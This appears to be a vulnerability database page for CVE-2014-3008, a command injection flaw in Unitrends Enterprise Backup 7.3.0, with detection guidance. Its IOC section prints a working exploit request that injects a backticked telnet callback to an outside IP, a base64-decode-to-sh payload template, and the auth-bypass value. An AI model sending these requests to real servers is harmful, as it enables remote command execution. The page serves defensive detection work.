cbcvebase.
CVE-2014-3008
published 2014-04-28

CVE-2014-3008: Unitrends Enterprise Backup 7.3.0 allows remote authenticated users to execute arbitrary commands via shell metacharacters in the comm parameter to…

PriorityP261critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
6.96%
93.3th percentile
Unitrends Enterprise Backup 7.3.0 allows remote authenticated users to execute arbitrary commands via shell metacharacters in the comm parameter to recoveryconsole/bpl/snmpd.php.

Affected

1 ranges
VendorProductVersion rangeFixed in
unitrendsenterprise_backup

Detection & IOCsextracted from sources · hover to see the quote

path/recoveryconsole/bpl/snmpd.php
urlPOST /recoveryconsole/bpl/snmpd.php?type=update&sid=1&comm=notpublic`telnet+172.31.16.166+4444`&enabled=1&rx=4335379&ver=7.3.0&gcv=0
otherauth=1:/usr/bp/logs.dir/gui_root.log:100
path/usr/bp/logs.dir/gui_root.log
commandnotpublic`echo <base64_payload>|base64 --decode|sh`
  • Detect POST requests to /recoveryconsole/bpl/snmpd.php containing shell metacharacters (backticks, pipes, semicolons) in the 'comm' query parameter, indicating command injection attempts.
  • Alert on the static, predictable auth value '1:/usr/bp/logs.dir/gui_root.log:100' (URL-encoded: 1%3A%2Fusr%2Fbp%2Flogs%2Edir%2Fgui%5Froot%2Elog%3A100) appearing in POST body to any endpoint, as it indicates exploitation of the non-random auth bypass.
  • Flag requests where the 'comm' parameter value begins with 'notpublic' followed by backtick-enclosed commands, matching the exploit's injection pattern.
  • Monitor for outbound telnet connections initiated from the Unitrends server process, consistent with the proof-of-concept callback payload.
  • Inspect the Referer header for requests to snmpd.php; the exploit uses 'recoveryconsole/bpria/bin/bpria.swf' as referer, which may help correlate malicious sessions.
  • ·The Metasploit module defaults to SSL (port 443); network detection rules must account for HTTPS traffic and may require SSL inspection to detect the malicious POST body.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.